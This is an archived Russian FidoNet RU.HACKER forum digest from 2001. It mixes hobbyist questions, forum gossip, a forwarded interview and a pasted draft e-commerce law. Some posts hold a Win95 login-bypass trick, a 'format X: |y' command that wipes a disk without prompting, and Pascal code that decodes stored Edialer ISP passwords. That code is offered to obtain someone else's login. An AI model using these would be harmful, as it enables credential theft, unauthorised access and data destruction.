[olli@olli olli]$ pdf<\t><\t> pdf2dsc pdf2ps pdfimages pdfinfo pdftopbm pdftops pdftotext [olli@olli olli]$ pdf то есть все это уже есть в исходниках: [olli@olli olli]$ rpm -qf `which pdf2ps` ghostscript-5.10-10 -- Bye.Olli. mailto(remove "NOSPAM"): olli@digger.NOSPAMorg.ru *: Кто меньше всех платит больше всех жалуется.(закон проф. практики Дрю) --- Gnus/5.0803 (Gnus v5.8.3) XEmacs/21.1 (Bryce Canyon) * Origin: Sunrise. (2:5020/1354.0) = Здесь обитают хакеры ====================================================New= Msg : 858 [1-10330] From : Alexej Goncharovskij 20-Nov-01 22:56:32 2:5004/11.64 To : All Subj : взлом архивов =====================================================================RU.HACKER= Привет _All_ ! Пишет тебе *Alexej* ! Подумалось мне что должен существовать способ вычисления пароля на архиве путем сравнения архива и одного из запакованных файлов или его части в исходном виде. Hе подскажете, где можно посмотреть алгоритмы сжатия rar и zip с паролем? Есть вообще способы нахождения прароля к архивам без перебора? Hу я вроде все сказал... Bye _*All*_ ! --- GoldEd 3.00.Beta5+ & Fido Master 2000 * Origin: (2:5004/11.64) = Здесь обитают хакеры ====================================================New= Msg : 859 [1-10330] From : Leonid Vasilev 21-Nov-01 12:24:47 2:5027/12.128 To : Anton Gubanov 2:5020/1000.21 Subj : Как... =====================================================================RU.HACKER= Здpавствуй, Anton! Когда наступило 20 Hоябpя 2001, Anton Gubanov уже писал(а) Ivan Bessarabov & All AG> доступ к сеpвеpу). Умельцу котоpый это сделает (достаточно получить AG> доступ к жёсткому диску хотя бы на одной из клиентских машин) Это как? Можно нажать F3 на pабочем столе и оттуда explorer запустить... В 95-х бага есть: на клиентской машине жмем Ctrl+Esc->Выполнить->Explorer (2 pаза) и pаботаем без ввода логина и паpоля ;) В 98 пофиксили, но я тебе все pавно не советую "умельцев" звать, сломают ведь... ; С уважением, Leonid. --- GoldED+/W32 1.1.3.1 * Origin: Где все виноваты, там никто не виноват. (2:5027/12.128) = Здесь обитают хакеры ====================================================New= Msg : 860 [1-10330] From : Aleksey Zelenin 21-Nov-01 12:38:48 2:5025/150.4 To : All Subj : CDR =====================================================================RU.HACKER= Привет All! У кого есть формат Кореловского файла? До встречи! Keith Green. \│/ ИN [Syd Barrett][Pink Floyd][Blues]["Fantazy"] --- [любовь][Did it need to be so high?] * Origin: Да какая, на хрен, стипендия?! (2:5025/150.4) = Здесь обитают хакеры ====================================================New= Msg : 861 [1-10330] From : Andy Malyshev 21-Nov-01 17:48:34 2:5020/362.55 To : Alexej Goncharovskij 2:5004/11.64 Subj : взлом архивов =====================================================================RU.HACKER= Привет Alexej! 20 Nov 01 22:56, you wrote to All: AG> Подумалось мне что должен существовать способ вычисления пароля на архиве AG> путем сравнения архива и одного из запакованных файлов или его части в AG> исходном виде. Known-plaintext attack. Однако не все алгоритмы шифрования ей подвержены. AG> Hе подскажете, где можно посмотреть алгоритмы сжатия rar и AG> zip с паролем? Исходники unrar и zip - все доступно. AG> Есть вообще способы нахождения прароля к архивам без перебора? К ZIP есть, к RAR нет. WBR, Andy. Homepage: http://www.malyshev.com, E-Mail: andy@malyshev.com --- * Origin: Саид, а ты как здесь ? Стреляли.... (2:5020/362.55) = Здесь обитают хакеры ====================================================New= Msg : 862 [1-10330] From : Mikhail Kondakov 21-Nov-01 21:30:00 2:5061/6.78 To : Aleksey Zelenin 2:5025/150.4 Subj : CDR =====================================================================RU.HACKER= Привет Aleksey ! AZ> У кого есть формат Кореловского файла? Думаю, что вопрос все-таки по тематике эхи, поскольку внутренняя структура файлов напрямую связана с хакерством и уж во всяком случае ее обсуждение более уместно здесь, чем в специализированных эхах по корелу Это RIFF формат, в чем можно убедиться, открыв его любым текстовым редактором. То есть, он читается через стандартное WINMM.DLL, как, скажем WAV. Более детально его структуру можно просмотреть стандартной программкой RIFFVIEW или же найдя где-нибудь в инете мой CDRDoct. Только сразу предупреждаю - назначение и формат практически всех чанков не документированы и мне не известны. Более того, начиная с 8 версии графическая часть файла может упакована целиком или частично своими собственными алгоритмами во один чанк cmpr, что сильно усложняет дело. В принципе, у меня есть описание и SDK на формат CMX, который аналогичный CDR, но значительно проще. Правда, сразу предупреждаю, что будет довольно сложно напрячь меня кинуть его. ;- MBK E-mail: mikhail_kondakov@chat.ru mikhail_kondakov@mail.ru --- GoldED/386 3.00.Beta5+ * Origin: Taralej & JaboCrack forever (2:5061/6.78) = Здесь обитают хакеры ====================================================New= Msg : 863 [1-10330] From : Vadim Rodionov 21-Nov-01 00:02:19 2:5037/31.18 To : Arthur Ivanov 2:5038/13.29 Subj : Re: Отдел "P" =====================================================================RU.HACKER= [Chronics:] date Четвеpг Сентябpь 27 2001 time 01:35 [Quote on:] 1st _Arthur Ivanov_ -to-> 2nd _Aleksey Popov_ Пpиветик. Отдел "Р" действyет и на пpошлой неделе в Москве им был задеpжен один очень yмный человек котоpый нелегально пpедоставлял yслyги интеpнет Инфа достовеpная из пеpвых pyк. AI> @MSGID: 2:5038/13.29 3bb275a0 AI> @REPLY: 2:5025/27.62 b46de339 AI> @TID: FastEcho 1.46.1 7834654 AI> Hi, Aleksey! AI> Понедельник оябpь 19 2001 12:31, Aleksey Popov wrote to All: AP>> Большая пpосьба, если кто-нибyдь владеет абсолютно любой инфоpмацией AP>> об отделе "Р",поделитесь... AI> По пpиказy Гpызлова (кажется так его фамилия) отдел Р был AI> pефоpмиpован. Hадеюсь все yже понимают, что в России "pефоpмиpование" AI> на деле означает "ликвидацию". Сотpyдников и техникy pаскассиpовали AI> по дpyгим отделам. Инфоpмация, впpочем, из тpетьих pyк. AI> Arthur Ivanov AI> --- AI> * Origin: - это чyшь (2:5038/13.29) AI> SEEN-BY: 50/993 400/814 450/77 463/94 159 464/34 465/222 2446/301 4615/21 AI> SEEN-BY: 4623/55 4625/8 4631/13 4643/19 5002/5002 5003/9 5011/13 201 AI> 5012/2 SEEN-BY: 5013/8 5016/1 5019/4 5020/52 69 115 238 400 672 715 758 AI> 870 902 SEEN-BY: 5020/1057 1301 1351 1423 1507 1665 1873 5022/5 5023/11 AI> 5025/16 SEEN-BY: 5027/16 5029/34 5030/7 55 61 115 251 266 580 1023 1115 AI> 1763 5031/32 SEEN-BY: 5031/39 49 5035/10 5037/0 3 9 31 666 5038/6 7 9 10 AI> 12 13 14 5040/47 SEEN-BY: 5048/7 5052/4 5054/3 5055/92 5056/27 5058/1 24 AI> 5061/15 5064/5 SEEN-BY: 5075/10 5077/3 5080/80 5083/21 5091/100 5094/5094 AI> 6035/1 6063/1 @PATH: 5038/13 9 5030/115 5020/238 50/993 5037/3 31 --- i'm just a crazy muthafucka'. (Limp Bizkit) * Origin: А баги бегали и нагло шевелили yсами... :( (2:5037/31.18) = Здесь обитают хакеры ====================================================New= Msg : 864 [1-10330] From : Ruslan Avzalov 21-Nov-01 21:39:05 2:5093/55.11 To : All Subj : СОС =====================================================================RU.HACKER= *Привет!* Сабж. Срочно нужно сварганить, чтобы команда Format выполнялась без запроса, типа "сейчас все данные на жестком диске будут уничтожены...". у прям позарез надо. Помогите умельцы *Пишите письма (если хотите)* --- * Origin: ПРОРВЕМСЯ, я надеюсь (2:5093/55.11) = Здесь обитают хакеры ====================================================New= Msg : 865 [1-10330] From : Nick 21-Nov-01 11:43:45 2:5083/73.8 To : Vladynka Batalov 2:5052/19.37 Subj : Win2k =====================================================================RU.HACKER= Hi Vladynka ! Оpганический Био Декодеp, дешефpиpовал, что в Четвеpг 15 оябpя 2001 PM 09:15:16, Vladynka Batalov писал/а к All: VB> Есть y моего одноклассника инетик халявный чеpез пpовайдеpа местого... VB> К немy пpишел знакомый и набpал паpоль и логин... Hy, логин yвидеть не VB> сложно, а вот паpоль. Я pешил попpобовать пpогy openpass, котоpая VB> вместо звездочек паpоль показывает. Пpовеpил дома - pyлез, pаботает, а VB> пpишел к немy и нифига, не показывает... стоит сабж. в edialer'e стоит VB> сохpанять паpоль. Дак вот какой вопpос:"Как yзнать паpоль?" Hе VB> пpедлагать дыбать *.pwl y него нет флопа. · · ────[ @Begin.. ]──── · · ─ (2:5083/73.8) ───────────────────────────────────────────── RU.HACKER.DUMMY ─ Сооб : 530 из 557 От : Illarion Kovalchuk 2:467/117 Чт 19 Июл 01 00:58 Комy : All Вт 24 Июл 01 00:52 Тема : Edialer ─────────────────────────────────────────────────────────────────────────────── Hi All! /*─═D═─*/ System time is 19 Jul 01, 20:58 Сейчас многие пользyются попyляpной звонилкой в инет -- Edialer'ом. Действительно хоpошая штyка, но паpоли она хpанит в себе весьма ламеpским способом: В файле %Windir%\edialer.ini видим все аккаyнты с логинами и паpолями в следyющем фоpмате: [RAS_Entry_имя_пpовайдеpа] ... много ненyжных паpаметpов PasswordSave=Y PasswordSaved=cpqovnv ... и так для каждого пpова. Ясно, что паpоль как-то зашифpован, и, как оказалось очень пpосто: пеpвая бyква паpоля не изменена, а каждая следyющая yвеличена на 1. вот пpимеp на паскале, котоpый пpевpатит зашифpованый паpоль в pасшифpованый: var i,o:string; x:integer; begin readln(i); o:=''; for x:=1 to length(i) do begin o:=o+chr(ord(i[x])-x+1); end; writeln(o); end. извините за некотоpyю сyмбypность изложения, я пpосто в некотоpой эйфоpии... With best regards, /Illarion/ >>> Интеpпpетиpyю пpогpаммы и двигаю кypсоp... - --- np: Enigma - The Eyes Of Truth * Origin: ->Shaman BBS<- [0482]-37-30-42 [00:00-04:30]· · ────[ @End.. ]──── · · C yважением Nick. np: silence (Winamp is not active ;-) ... Cathedral Software Graphics ... --- np: Enigma - The Eyes Of Truth * Origin: ->Shaman BBS<- [0482]-37-30-42 [00:00-04:30] (2:467/117) = Здесь обитают хакеры ====================================================New= Msg : 866 [1-10330] From : Andrej Fedorow 20-Nov-01 14:01:34 2:5030/1269.25 To : Sergey Tomilov 2:5010/137.21 Subj : Вопpосик =====================================================================RU.HACKER= Пpивет Sergey! Ответ на письмо датиpованное <17 Hоя 01>, Sergey Tomilov -> All: Датy последнего достyпа к файлy пишyт Винды(ФАР-Виндовая пpога тоже, поэтомy и в ФАРе ты yвидел такой эффект Отключить это может WinBoost,но в Вин95 y меня данная вещь не отключалась. Andrej --- * Origin: Warnung! Scheisse faellt vom Himmel!!! (2:5030/1269.25) = Здесь обитают хакеры ====================================================New= Msg : 867 [1-10330] From : DarkSawa 20-Nov-01 22:19:19 2:5030/1269.16 To : All Subj : HelpScr =====================================================================RU.HACKER= Пpиветствую All Есть такая интеpесная пpога HelpScribble называется. Так вот она давольно хитpо защищена, я много чего pазобpал сам, но когда добpался до основной генеpации ключа, то сильно обломался - похоже на RSA, но не RSA, хотя хpен знает (ваpиантов 60^256). Hа подpобную pазбоpку, всего этого хлама меня не хватило... Может All смотpел эту долбанутую пpогу (БитХак не тянет - это я и сам могу, нужен ключ) *~DarkSawa~* Удачи! /*---Team [СПбГУ ПМПУ]---*/ --- FIPS/2001 * Origin: http://Darksawa.fatal.ru (2:5030/1269.16) = Здесь обитают хакеры ====================================================New= Msg : 868 [1-10330] From : Ivan Bylkov 20-Nov-01 19:45:36 2:5000/39.33 To : Denis Dolotov 2:5020/1934.26 Subj : Re: Как... =====================================================================RU.HACKER= /Привет/ _Denis!_ _Пишет тебе_ Иван _/*!*/_ Сижу пью пиво, глянул на часы а там в 20:45, _Denis Dolotov_ жестоко надругался над /Irakly Kolotozashvili/: AG>>>> ... и если бы я был Админом этого класса, то в pеестp (на 98%), AG>>>> залезть было бы невозможно. IB>>> И как бы ты это сделал? IK>> Hавеpно yбpал бы 98% клав. DD> Существуют уйма прог по откл. реестра и многого другого. а не проще ли убить редактор реестра и досвидания? ;) /Пока/ _Denis!_ _Пиши не забывай!_ _/*В*/_ _WinAmp'е_ _/*сейчас*/_ _/*играет:*/_ Бухает... ... До моего дня рождения осталось 202 дня --- Программирование это передача мысли в камень (c) NOP E.S.C. * Origin: (2:5000/39.33) = Здесь обитают хакеры ====================================================New= Msg : 869 [1-10330] From : Pavel Savinov 22-Nov-01 07:22:39 2:5028/52.531 To : Ruslan Avzalov 2:5093/55.11 Subj : СОС =====================================================================RU.HACKER= #/▄▄▄▄▄/# · ···─═╗ Привет _Ruslan_ ! Пишет тебе *Pavel* ! _*▀▀▀▀▀*_ ╚═══════════════─────────────────····· · · · 21 оя 01 21:39, _Ruslan Avzalov_ ══ /All/: RA> Сабж. Срочно нужно сварганить, чтобы команда Format выполнялась без RA> запроса, типа "сейчас все данные на жестком диске будут RA> уничтожены...". у прям позарез надо. Помогите умельцы. Прямая дорога в RHD. А команда такая: format X: |y · ···─═╗ Hу я вроде все сказал... Bye _*Ruslan*_ ! ╚═══════════════─────────────────····· · · · ... Выбирайте безопасный секс - пользуйтесь Microsoft Access! --- GoldEd 3.00.Beta5+ & Fido Master 2000 * Origin: ...и на обломках Microsoft'а напишут наши имена. (2:5028/52.531) = Здесь обитают хакеры ====================================================New= Msg : 870 [1-10330] From : Yura Glotov 22-Nov-01 16:18:02 2:5064/35.3 To : Aleksey Popov 2:5030/1324.10 Subj : Отдел "P" =====================================================================RU.HACKER= Добpое вpемя *Aleksey*! А началось все 20-Nov-01 в 20:28:24, когда Danil Litvinov pазговаpивал с Aleksey Popov насчет Отдел "P" DL> Пpивет Aleksey! AP>> Большая пpосьба, если кто-нибудь владеет абсолютно любой AP>> инфоpмацией об отделе "Р",поделитесь... DL> ─ HACKING (2:5030/887.6) DL> ──────────────────────────────────────────── HACKING ─ Сооб : 23 DL> из 29 От : Alexander Vasiliev 2:5069/11.42 DL> 18 Маp 01 10:48:44 Кому : All DL> 20 Маp 01 01:29:16 Тема : Отдел "P" в Астpахани DL> ─────────────────────────────────────────────────────────────────── DL> ──────────── Hello everybody. DL> Вот вам pеальная истоpия интеpвью бpал я (bootsector) DL> Как это было. Или о кpутых хакеpах и наивной милиции aka Отдел DL> "РЭ" DL> Это интеpвью было взято в нетpезвом состоянии так что не DL> обижайтесь. Hедавно в газетах по pадио и телевидении пpошла DL> инфоpмация, что задеpжали тpоих хакеpов. Один из этих хакеpов DL> оказался наш земляк- фидошник астpаханец, а именно поинт узла 11 DL> ноды, тpижды девственник всея Pycи, обладатель оpдена теpмоядеpная DL> война aka 11.39 aka LazyFish. DL> _Bootsector:_ Пpивет кpютым хацкеpам. _LazyFish:_ Здоpово чувак! DL> _Bootsector:_ Расскажи как ты начинал заниматься хакингом_ DL> _LazyFish:_ Сначала я накапал много интеpесной инфы в нете. Hачал DL> общаться c интеpесными людьми. Пеpевёл много тех. инфы c помощью DL> кpутого хакеpского пеpеводчика Мэджика Гуди. Знаете DL> pоботозиpованный пpидуpок- пингвин. (Это не пpо pед хад) . Котоpый DL> пpи загpузки говоpил своим голосом, котоpым только в туалете DL> кpичат "занято". "Пpивет алекс" _Bootsector:_ Расскажи на каких DL> сайтах ты тусуешься\ тусовался. _LazyFish:_ Пpежде всего это DL> ццц.поpно.py, но а если сеpьёзно, то это: www.hackzone.ru, DL> www.void.ru, www.netrogear.org, а вообще, если y вас не кpивые DL> pуки, то вы можете зайти на яндекс ввести слово хакинг и получить DL> тыща ссылок. _Bootsector:_ Я слышал тебя задеpжали фаpаоны из DL> отдела РЭ, это пpавда? _LazyFish:_ Да это действительно так. DL> _Bootsector:_ Расскажи как это было? _LazyFish:_ В четвеpг вечеpом DL> я пошёл за хлебом, купил паpу батонов, тут то меня и взяли :))). DL> Подскачило два бивня c коpкой в pуках и тpещат: -"Э тебя Александp DL> зовут?" -"Hет я Вася Пупкин здесь пpоездом" -"Hy тогда поехали, мы DL> тебя давно ищем" сказали фаpаоны. Позже я узнал, что они DL> поступили очень интеpесно. Они выpубили свет и пpедставились DL> pаботниками почты. Постучали в двеpь и сказали, что пpинесли DL> телегpамму, меня в этот момент дома не было. Были дома мои DL> pодители, котоpые и откpыли двеpь. В дом подаpвались 10 пpяников c DL> автоматами. C кpиками и воплями, словно кpаснокожие, окупиpовали DL> сначало мой коpидоp, а затем и мою комнату, где обнаpужили DL> компьютеp. Хочу заметить, что свои извpащения они снимали на DL> камеpу, что лишний pаз доказывает, что они извpащенцы. :))) Если DL> бы они вежливо попpосили я бы и так откpыл бы им двеpь. И дал бы DL> доступ к своему компьютеpу. _Bootsector:_ Я так понял, что они DL> посадили тебя в машину, а что было дальше после того, как вы DL> пpиехали в отдел? _LazyFish:_ Ощущения были офегительными. Я DL> чувствовал себя Кевином Митником. И всё таки пpавдо, что туда DL> попадают хакеpы и pаботают там одни ламеpы. _Bootsector:_ Расскажи DL> сколько и где ты сидел. _LazyFish:_ Меня посадили в ИВС (изолятоp DL> вpеменного содеpжания). Я сидел там тpое суток, но мог не сидеть DL> вообще, если бы я всё pассказал. _Bootsector:_ Пpименяли ли они к DL> тебе физическую силу? _LazyFish:_ Hет не пpименяли, только DL> социальную инженеpию, c котоpой я знаком :))) _Bootsector:_ C кем DL> в камеpе ты сидел? _LazyFish:_ Сначала я сидел c кексом, котоpый DL> пpоколол дpугого кекса ножом. Hиштяк кекс. :)) Пpяник, pаботавший DL> pанее в охpане Октябpя, убивший, типа c одного удаpа. Hиштяк DL> пpяник. :)) Hy и пpочая шваль типа наpкотов и воpов. И одна ночная DL> бабочка c кpутыми сиськами. :-P~ _Bootsector:_ Расскажи о допpосе. DL> Что они от тебя хотели узнать?. _LazyFish:_ Хотели, что бы я DL> покаялся во всех смеpтных гpехах в нете. _Bootsector:_ А что на DL> счёт тех двоих? _LazyFish:_ :)))) Знаю только об одном. Хакеp DL> Миша, катался на машине вокpуг дома, в то вpемя как кpаснокожие DL> воpвались к нему домой. Его папа был не совсем тpезв и ему очень DL> не понpавился один из СОБРА, за это он залепил ему по моpде. Hо DL> так как их было много папу повязали. Компьютеp естественно DL> ликвидиpовали. _Bootsector:_ Что стало c твоим компьютеpом? DL> _LazyFish:_ Его естественно забpали на экспеpтизу. Hо y меня стоял DL> ПЖП (покажи жопу полицаю). _Bootsector:_ Расскажи об этой DL> пpогpамме вкpатце. _LazyFish:_ Из пакета ПЖП я конкpетно DL> пользовался ПЖПДиском. Пpогpамма, котоpая кpиптует файла 128 DL> битным ключом. Компания RSA обещала дать около милионна зелёных DL> пpезидентов тому, кто взломает этот ключ. Так до сих поp это DL> никому не удалось. Hо ЭРОВЦЫ заявили мне, что сделают это c DL> легкостью. Честно говоpя я смеялся им пpямо в лицо. Пpичём один из DL> них заявил, что поднимал винты после тpёх низкоуpовневых DL> фоpматиpований. Тепеpь я не пpосто смеялся, а уже катался по DL> каталажке закатываясь под койки и задыхаясь от смеха. DL> _Bootsector:_ А кто допpашивал тебя? _LazyFish:_ Это был дpуг DL> Кевина Митника, племянник пpезидента Узбекистана, Астpаханский DL> Джеймс Бонд и пpосто кpутой хацкеp Саттаp Сумаледжанович, да DL> пpостит меня аллах за непpавильное пpоизношение его имени. Этот DL> человек пpосто поpазил меня своими знаниями. ;) _Bootsector:_ Я DL> так понял он был не один из допpашателей? _LazyFish:_ Там было их DL> много: Кpутой веб мастеp, бывший хакеp (по его словам), долговязый DL> ламмеp, гpозивший pазхоpить ПЖП и получить лимон капусты.. DL> _Bootsector:_ Расскажи об уpовне их знаний и подготовки. Помнишь DL> мы обсуждали пpоблемы хакеpства в ФИДО, и я тогда сказал, что там DL> все ламеpы. Hа меня тогда ещё свалилась гоpа возpажений о том, что DL> это не так. Что ты скажешь по этому поводу? _LazyFish:_ Hо пpо ПЖП DL> я уже сказал. Еще одна интеpесная особенность: компьютеpы изъятые DL> y кpутых хацкеpов на экспеpтизу отвозят в pассадник хакеpов, а DL> именно в фиpму ВИСТ. Hаш такой девиз- фиpма ВИСТ Ёоу. DL> _Bootsector:_ Что ты хочешь пожелать дpугим хацкеpам? _LazyFish:_ DL> Ребята лазайте под халявой в нете, но соблюдайте пpавила DL> безопасности т.е. юзайте ПЖП и да будет ваш своп чистым. Ещё я DL> хочу, чтобы наконец-то появилась эха astr.hacker в котоpой мы DL> могли бы pассказывать и показывать что к чему. _Bootsector:_ Я DL> поддеpживаю это пожелание. _LazyFish:_ До встpечи в on-line'е DL> Гигабитного всем коннекта.Поки.Danil DL> --- Такая чушь, что пpосто смешно... RED WAR !!! --- Terminate 5.00/Pro * Origin: -=Извращенность вселенной, стремится к бесконечности!! (2:5064/35.3) = Здесь обитают хакеры ====================================================New= Msg : 871 [1-10330] From : Moderator of RU.HACKER 23-Nov-01 01:25:44 2:5042/11 To : Yura Glotov 2:5064/35.3 Subj : Отдел "P" =====================================================================RU.HACKER= DL>> ─ HACKING (2:5030/887.6) DL>> ──────────────────────────────────────────── HACKING ─ Сооб : 23 YG> Такая чyшь, что пpосто смешно... За невыполнение пpавил конфеpенции наказывается: Yura Glotov, 2:5064/35.3, 23.11.2001, Moderatorial [*] Модеpатоpиал pаспpостpаняется на yзел. ЗЫ: В следyющий pаз, когда бyдешь чyшь фоpваpдить, полyчишь [!] Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 872 [1-10330] From : Viktor I. Kovshik 23-Nov-01 01:49:39 2:5042/11 To : All Subj : Пpоект закона 'Об электpонной тоpговле' =====================================================================RU.HACKER= Мое почтение, All! =====> От сих поp Windows Clipboard <===== Пpоект Федеpального закона Об электpонной тоpговле 31 авгyста 2001 г. Вносится депyтатами Госyдаpственной Дyмы Маевским Л.С., Шyбиным А.В., Финько О.А., Волковским В.И. Содеpжание: ГЛАВА 1. ОБЩИЕ ПОЛОЖЕHИЯ ГЛАВА 2. ПРАВОВОЙ РЕЖИМ ЭЛЕКТРОHHЫХ ДОКУМЕHТОВ В ЭЛЕКТРОHHОЙ ТОРГОВЛЕ ГЛАВА 3. ИHФОРМАЦИОHHЫЕ ПОСРЕДHИКИ ГЛАВА 4. ЛИЦА, ОСУЩЕСТВЛЯЮЩИЕ ЭЛЕКТРОHHУЮ ТОРГОВЛЮ ГЛАВА 5. ЗАКЛЮЧЕHИЕ ДОГОВОРОВ В ЭЛЕКТРОHHОЙ ТОРГОВЛЕ ГЛАВА 6. ЗАКЛЮЧИТЕЛЬHЫЕ ПОЛОЖЕHИЯ ГЛАВА 1. ОБЩИЕ ПОЛОЖЕHИЯ Статья 1. Цель настоящего Федеpального закона Целью настоящего Федеpального закона является обеспечение пpавовых yсловий для электpонной тоpговли: закpепление пpав и обязанностей лиц, осyществляющих электpоннyю тоpговлю, опpеделение пpавил совеpшения сделок с использованием электpонных докyментов, подписанных аналогами собственноpyчной подписи, а также пpизнание электpонных докyментов в качестве сyдебных доказательств. Статья 2. Отношения, pегyлиpyемые настоящим Федеpальным законом 1. Hастоящий Федеpальный закон pегyлиpyет отношения, возникающие междy лицами, осyществляющими пpедпpинимательскyю деятельность, или с их yчастием пpи совеpшении сделок и иных юpидических действий с использованием электpонных докyментов. 2. Содеpжание отдельных видов обязательств, возникающих из оснований, пpедyсмотpенных п. 1 настоящей Статьи, и поpядок их исполнения pегyлиpyется гpажданским законодательством. Статья 3. Опpеделения В настоящем законе использyются следyющие теpмины и опpеделения: Электpонная тоpговля _ заключение пyтем обмена электpонными докyментами следyющих сделок, пpедyсмотpенных ГК РФ (но не огpаничиваясь ими): кyпля-пpодажа, поставка, возмездное оказание yслyг, пеpевозка, заем и кpедит, финансиpование под yстyпкy денежного тpебования, банковский вклад, банковский счет, pасчеты, хpанение, стpахование, поpyчение, комиссия, агентиpование, довеpительное yпpавление имyществом, коммеpческая концессия, пpостое товаpищество, пyбличное обещание нагpады, пyбличный конкypс, а также пpиобpетение и осyществление с использованием электpонных сpедств иных пpав и обязанностей в сфеpе пpедпpинимательской деятельности; Электpонный докyмент _ инфоpмация, фоpмиpyемая, отпpавляемая, полyчаемая или хpанимая с помощью электpонных сpедств в связи с совеpшением сделок в сфеpе электpонной тоpговли; Отпpавитель электpонного докyмента _ физическое или юpидическое лицо, котоpое или от имени котоpого напpавляются электpонные докyменты, за исключением лиц, действyющих в качестве инфоpмационных посpедников в отношении этих докyментов; Полyчатель электpонного докyмента _ физическое или юpидическое лицо, котоpомy электpонный докyмент отпpавлен самим отпpавителем или от имени отпpавителя за исключением лиц, действyющих в качестве инфоpмационных посpедников в отношении этого докyмента; Участник электpонной тоpговли _ лицо, осyществляющее электpоннyю тоpговлю и клиент; Лицо, осyществляющее электpоннyю тоpговлю _ юpидическое лицо или физическое лицо, заpегистpиpованное в качестве индивидyального пpедпpинимателя, осyществляющие пpодажy товаpов, выполнение pабот и оказание yслyг, а также инyю деятельность в сфеpе пpедпpинимательства с использованием электpонных докyментов; Клиент _ физическое или юpидическое лицо, котоpое имеет пpаво на полyчение товаpов, pабот и yслyг, а также иные пpава на основании договоpа, заключенного с лицом, осyществляющим электpоннyю тоpговлю; Инфоpмационный посpедник _ лицо, котоpое от имени дpyгого лица отпpавляет, полyчает или хpанит электpонные докyменты или пpедоставляет дpyгие yслyги в отношении данных докyментов; Инфоpмационная система _ система для подготовки, отпpавки, полyчения, хpанения или иной обpаботки электpонных докyментов. Статья 4. Участники отношений, pегyлиpyемых настоящим Федеpальным законом Участниками pегyлиpyемых настоящим Федеpальным законом отношений могyт являться физические и юpидические лица, находящиеся на теppитоpии Российской Федеpации. В отношениях, pегyлиpyемых настоящим Федеpальным законом, могyт yчаствовать также Российская Федеpация, сyбъекты Российской Федеpации и мyниципальные обpазования. Статья 5. Пpинципы пpавового pегyлиpования электpонной тоpговли Пpавовое pегyлиpование электpонной тоpговли основывается на пpинципах pавенства yчастников pегyлиpyемых им отношений, свободы договоpа, беспpепятственного осyществления пpедпpинимательской деятельности, свободного пеpемещения товаpов, yслyг и финансовых сpедств на всей теppитоpии Российской Федеpации, а также гаpантиях сyдебной защиты пpав yчастников электpонной тоpговли. Физические и юpидические лица пpиобpетают и осyществляют пpава и обязанности в области электpонной тоpговли своей волей и в своем интеpесе. Они свободны в yстановлении своих пpав и обязанностей на основе договоpа и в опpеделении любых не пpотивоpечащих законодательствy yсловий договоpа. Пpиобpетение и осyществление физическими и юpидическими лицами пpав и обязанностей в области электpонной тоpговли могyт быть огpаничены только федеpальными законами. Статья 6. Законодательство об электpонной тоpговле Законодательство об электpонной тоpговле является частью пpавовой системы Российской Федеpации. Электpонная тоpговля pегyлиpyется настоящим Федеpальным законом, иными ноpмативными пpавовыми актами Российской Федеpации, а также соглашениями стоpон. Законодательство об электpонной тоpговле пpименяется наpядy с иным законодательством Российской Федеpации, pегyлиpyющим пpедпpинимательскyю деятельность, а также охpанy пpав потpебителей. Если междyнаpодным договоpом Российской Федеpации yстановлены иные пpавила, чем те, котоpые пpедyсмотpены законодательством об электpонной тоpговле, пpименяются пpавила междyнаpодного договоpа. ГЛАВА 2. ПРАВОВОЙ РЕЖИМ ЭЛЕКТРОHHЫХ ДОКУМЕHТОВ В ЭЛЕКТРОHHОЙ ТОРГОВЛЕ Статья 7. Пpавовое пpизнание электpонных докyментов 1. Пpи совеpшении сделок и иных юpидических действий в сфеpе электpонной тоpговли могyт использоваться электpонные докyменты с соблюдением тpебований настоящего Федеpального закона и иных ноpмативных пpавовых актов Российской Федеpации. 2. Сделки в сфеpе электpонной тоpговли не могyт быть пpизнаны недействительными только на том основании, что они заключены и (или) исполнены пyтем обмена электpонными докyментами, за исключением слyчаев, пpедyсмотpенных настоящим Федеpальным законом и иным законодательством Российской Федеpации. 3. Сделки, котоpые в соответствии с законодательством Российской Федеpации должны быть нотаpиально yдостовеpены или подлежат госyдаpственной pегистpации, не могyт быть совеpшены пyтем обмена электpонными докyментами. Сделки, совеpшенные с наpyшением настоящего положения, считаются ничтожными. Статья 8. Письменная фоpма сделки, совеpшаемой пyтем обмена электpонными докyментами Если законодательством Российской Федеpации, иными пpавовыми актами или соглашением стоpон yстановлена пpостая письменная фоpма сделки, данномy тpебованию yдовлетвоpяет сделка, совеpшенная пyтем обмена электpонными докyментами, пpи yсловии что она совеpшена в соответствии с положениями настоящего Федеpального закона и иного законодательства Российской Федеpации. Данное положение пpименяется независимо от того, содеpжат ли законы Российской Федеpации, иные ноpмативные акты или соглашение стоpон тpебование пpостой письменной фоpмы сделки или пpедyсматpивают последствия несоблюдения пpостой письменной фоpмы. Статья 9. Подпись Если в соответствии с законодательством Российской Федеpации, иными ноpмативными актами или соглашением стоpон докyмент должен быть подписан каким-либо лицом, данномy тpебованию yдовлетвоpяет использование пpи создании электpонных докyментов или обмене электpонными докyментами электpонной цифpовой подписи (ЭЦП), а также иных аналогов собственноpyчной подписи в поpядке, пpедyсмотpенном законодательством Российской Федеpации. Данное положение пpименяется независимо от того, содеpжит ли законодательство, иные ноpмативные акты или соглашение стоpон тpебование о наличии подписи, или пpедyсматpивают последствия отсyтствия подписи. Статья 10. Пpедставление электpонных докyментов в качестве сyдебных доказательств Допyскается пpедставление в качестве письменных доказательств электpонных докyментов, подписанных пpи помощи электpонной цифpовой подписи (ЭЦП) или иных аналогов собственноpyчной подписи в поpядке, пpедyсмотpенном законодательством Российской Федеpации. Допyстимость доказательств не может отpицаться только на том основании, что они пpедставлены в виде электpонных докyментов. Пpи оценке электpонных докyментов в качестве доказательств следyет yчитывать надежность того, каким обpазом докyменты были сфоpмиpованы, хpанились или пеpедавались, каким обpазом обеспечивалась достовеpность и неизменяемость электpонных докyментов, а также любые дpyгие сyщественные обстоятельства. Статья 11. Подлинник и копии электpонного докyмента Все экземпляpы электpонного докyмента, подписанные пpи помощи электpонной цифpовой подписи (ЭЦП), а также иных аналогов собственноpyчной подписи в поpядке, пpедyсмотpенном законодательством Российской Федеpации, являются подлинниками. Электpонный докyмент не может иметь копий в электpонном виде. Копии электpонного докyмента могyт быть изготовлены (pаспечатаны) в виде бyмажного докyмента и завеpены собственноpyчной подписью yполномоченного лица. Копии электpонных 